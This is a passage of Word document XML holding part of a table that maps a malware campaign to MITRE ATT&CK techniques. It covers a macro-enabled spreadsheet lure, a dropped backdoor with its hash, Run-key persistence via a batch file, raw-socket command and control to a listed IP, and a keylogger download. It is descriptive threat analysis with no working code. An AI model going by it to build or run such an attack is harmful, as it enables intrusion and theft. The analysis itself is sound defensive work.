          <w:p w14:paraId="368DE7C0" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D007562" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15A41921" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5364C973" w14:textId="35058D13" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77E74682" w14:textId="13D2BAFB" w:rsidR="00775D24" w:rsidRPr="00775D24" w:rsidRDefault="0069253B" w:rsidP="00775D24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>emails with an Excel spreadsheet attachment named “Message.xlsb</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Opening the .XLSB file asks the recipient to enable macros.</w:t>
            </w:r>
            <w:r w:rsidR="008E1133">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00775D24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="00775D24" w:rsidRPr="00775D24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">The file, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00775D24" w:rsidRPr="00775D24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NTUSER.dat{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00775D24" w:rsidRPr="00775D24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>GUID}.exe (SHA-1: 64ba130e627dd85c85d</w:t>
            </w:r>
            <w:r w:rsidR="008E1133">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00775D24" w:rsidRPr="00775D24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">6534e769d239080e068dd, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C911F09" w14:textId="7E88CF80" w:rsidR="00775D24" w:rsidRPr="00B857D7" w:rsidRDefault="00775D24" w:rsidP="00775D24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00775D24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>detected by Trend Micro as “BKDR_SWRORT.CP”) has been dropped prior to launching the</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E1437" w:rsidRPr="00EF728A" w14:paraId="425DFD04" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DBCC85A" w14:textId="37D0E2EC" w:rsidR="006E1437" w:rsidRPr="00EF728A" w:rsidRDefault="006E1437" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E5F0846" w14:textId="4B3C2B1E" w:rsidR="006E1437" w:rsidRDefault="006E1437" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ECD4EA0" w14:textId="3E67CF09" w:rsidR="006E1437" w:rsidRPr="00EF728A" w:rsidRDefault="006E1437" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1059 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1437">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="254E513A" w14:textId="2F7E7459" w:rsidR="006E1437" w:rsidRPr="00EF728A" w:rsidRDefault="006E1437" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="488EF6B6" w14:textId="77777777" w:rsidR="006E1437" w:rsidRPr="00EF728A" w:rsidRDefault="006E1437" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F9B7963" w14:textId="21423946" w:rsidR="006E1437" w:rsidRPr="00EF728A" w:rsidRDefault="006E1437" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A8C9990" w14:textId="6EB9F2FB" w:rsidR="006E1437" w:rsidRPr="00EF728A" w:rsidRDefault="006E1437" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B92E870" w14:textId="77777777" w:rsidR="006E1437" w:rsidRDefault="006E1437" w:rsidP="006E1437">
            <w:r>
              <w:t xml:space="preserve">[2] The backdoor installation is fairly straightforward. A file called “tmp.bat” is created in the infected </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EEC17E7" w14:textId="2B60B372" w:rsidR="006E1437" w:rsidRDefault="006E1437" w:rsidP="006E1437">
            <w:r>
              <w:t>systems’ root folder and executed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F437F" w:rsidRPr="00EF728A" w14:paraId="69F031F2" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1549FB8E" w14:textId="38EA99BF" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="008F437F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="524426EA" w14:textId="4FD90409" w:rsidR="008F437F" w:rsidRDefault="008F437F" w:rsidP="008F437F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B95BEEB" w14:textId="537CB4AB" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="008F437F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF728A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1547.001 Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ACA0407" w14:textId="28105D9A" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="008F437F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13096566" w14:textId="77777777" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="008F437F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A83C043" w14:textId="1BC04C12" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="008F437F" w:rsidP="008F437F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF728A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B73ABBF" w14:textId="06E4AE34" w:rsidR="008F437F" w:rsidRPr="00EF728A" w:rsidRDefault="00DC24EE" w:rsidP="008F437F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C95431D" w14:textId="19F4C7C0" w:rsidR="008F437F" w:rsidRDefault="008F437F" w:rsidP="008F437F">
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="008F437F">
              <w:t xml:space="preserve">The first line adds a “run” registry key to make the file </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="008E1133">
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="008F437F">
              <w:t>TUSER.dat{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008F437F">
              <w:t>GUID}.exe</w:t>
            </w:r>
            <w:r w:rsidR="003F0C98">
              <w:t xml:space="preserve"> persistent</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F909D51" w14:textId="086D8A50" w:rsidR="003F0C98" w:rsidRDefault="003F0C98" w:rsidP="008F437F">
            <w:r>
              <w:t>Second line deletes the .bat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00775D24" w:rsidRPr="00601A8D" w14:paraId="62E2ABAC" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B08C697" w14:textId="77777777" w:rsidR="00775D24" w:rsidRPr="00601A8D" w:rsidRDefault="00775D24" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00601A8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AB74F71" w14:textId="77777777" w:rsidR="00775D24" w:rsidRPr="00601A8D" w:rsidRDefault="00775D24" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA0011 Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="156F91EC" w14:textId="77777777" w:rsidR="00775D24" w:rsidRPr="00601A8D" w:rsidRDefault="00775D24" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1095 Non-Application Layer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="743DC57A" w14:textId="77777777" w:rsidR="00775D24" w:rsidRPr="00601A8D" w:rsidRDefault="00775D24" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00CDC2C0" w14:textId="77777777" w:rsidR="00775D24" w:rsidRPr="00601A8D" w:rsidRDefault="00775D24" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70B4E2BD" w14:textId="77777777" w:rsidR="00775D24" w:rsidRPr="00601A8D" w:rsidRDefault="00775D24" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="666B6631" w14:textId="6E9F17DC" w:rsidR="00775D24" w:rsidRPr="00601A8D" w:rsidRDefault="00775D24" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146130FF" w14:textId="77777777" w:rsidR="00775D24" w:rsidRDefault="00775D24" w:rsidP="00775D24">
            <w:r>
              <w:t xml:space="preserve">[2] BKDR_SWRORT.CP is a small downloader that communicates with and downloads files from the IP </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="413C6302" w14:textId="7FE5FF2D" w:rsidR="00775D24" w:rsidRDefault="00775D24" w:rsidP="00775D24">
            <w:r>
              <w:t xml:space="preserve">address, 84.11.146.62. </w:t>
            </w:r>
            <w:r w:rsidR="008E1133">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[1] Communication protocol </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F2C55C0" w14:textId="68B54B21" w:rsidR="00775D24" w:rsidRPr="00601A8D" w:rsidRDefault="00775D24" w:rsidP="008E1133">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>The malware uses raw sockets over IP protocol (IPPROTO_IP flag), effectively implementing its own protocol for data transfer</w:t>
            </w:r>
            <w:r w:rsidR="008E1133">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Initial contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE6522" w:rsidRPr="00EF728A" w14:paraId="17BB214F" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2843910E" w14:textId="18083C03" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432097AF" w14:textId="0EF2F93D" w:rsidR="00DE6522" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA0011 Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5467E6FF" w14:textId="1A504AD7" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="311596FC" w14:textId="4AE93136" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="244E0CED" w14:textId="77777777" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6152AF98" w14:textId="6F11D4DB" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C274FB5" w14:textId="3E68A4BE" w:rsidR="00DE6522" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B29A566" w14:textId="05617C60" w:rsidR="00DE6522" w:rsidRDefault="00DE6522" w:rsidP="00DE6522">
            <w:r>
              <w:t>[2] See above. Download keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00775D24" w:rsidRPr="00EF728A" w14:paraId="1CF7530A" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="284D4022" w14:textId="31EF29FA" w:rsidR="00775D24" w:rsidRPr="00EF728A" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">7 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A22BBF" w14:textId="4423F68B" w:rsidR="00775D24" w:rsidRDefault="00DE6522" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA0009 Collection</w:t>
            </w:r>
          </w:p>
